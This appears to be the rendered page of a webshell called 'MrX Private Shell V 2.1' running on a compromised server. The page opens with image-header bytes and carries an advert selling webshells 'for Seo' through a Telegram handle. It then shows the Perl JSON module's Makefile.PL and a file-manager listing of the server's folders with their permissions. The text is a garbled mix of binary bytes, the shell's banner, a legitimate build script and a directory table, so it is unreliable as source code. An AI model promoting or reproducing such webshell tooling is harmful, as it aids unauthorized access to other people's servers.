����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
require 5.00503;
use strict;
use ExtUtils::MakeMaker;
use lib qw( ./lib );
$| = 1;
$ENV{PERL_JSON_BACKEND} = 'JSON::backportPP';
eval q| require JSON |;
if ($@) {
print "Loading lib/JSON.pm failed. No B module?\n";
print "perl says : $@";
print "Setting environmental variable 'PERL_DL_NONLAZY' to 0 may help.\n";
print "No Makefile created.\n";
exit 0;
}
my $version = JSON->VERSION;
print <<EOF;
Welcome to JSON (v.$version)
=============================
** BACKWARD INCOMPATIBILITY **
Since version 2.90, stringification (and string comparison) for
JSON::true and JSON::false has not been overloaded. It shouldn't
matter as long as you treat them as boolean values, but a code that
expects they are stringified as "true" or "false" doesn't work as
you have expected any more.
if (JSON::true eq 'true') { # now fails
print "The result is $JSON::true now."; # => The result is 1 now.
And now these boolean values don't inherit JSON::Boolean, either.
When you need to test a value is a JSON boolean value or not, use
JSON::is_bool function, instead of testing the value inherits
a particular boolean class or not.
EOF
WriteMakefile(
'NAME' => 'JSON',
'VERSION_FROM' => 'lib/JSON.pm', # finds $VERSION
'ABSTRACT_FROM' => 'lib/JSON.pm', # retrieve abstract from module
'AUTHOR' => 'Makamaka Hannyaharamitu, E<lt>makamaka[at]cpan.orgE<gt>',
'PREREQ_PM' => {
'Test::More' => 0.88,
'Scalar::Util' => '1.08'
},
( $ExtUtils::MakeMaker::VERSION >= 6.3002 ? ('LICENSE' => 'perl', ) : () ),
( $ExtUtils::MakeMaker::VERSION >= 6.46 ? (
'META_MERGE' => {
resources => {
repository => 'https://github.com/makamaka/JSON',
bugtracker => 'https://github.com/makamaka/JSON/issues',
},
recommends => {
'JSON::XS' => JSON->require_xs_version,
},
} ) : ()
),
);
if ($] < 5.006) { # I saw to http://d.hatena.ne.jp/asakusabashi/20051231/p1
open(IN, "Makefile");
open(OUT,">Makefile.tmp") || die;
while(<IN>) {
s/PERL_DL_NONLAZY=1//g;
print OUT;
}
close(OUT);
close(IN);
rename("Makefile.tmp" => "Makefile");
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| eg | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| Changes | File | 14.97 KB | 0644 |
|
| MANIFEST | File | 1.64 KB | 0644 |
|
| META.json | File | 1.24 KB | 0664 |
|
| META.yml | File | 761 B | 0664 |
|
| MYMETA.json | File | 1.24 KB | 0644 |
|
| MYMETA.yml | File | 761 B | 0644 |
|
| Makefile | File | 30.23 KB | 0644 |
|
| Makefile.PL | File | 2.23 KB | 0644 |
|
| README | File | 44.89 KB | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|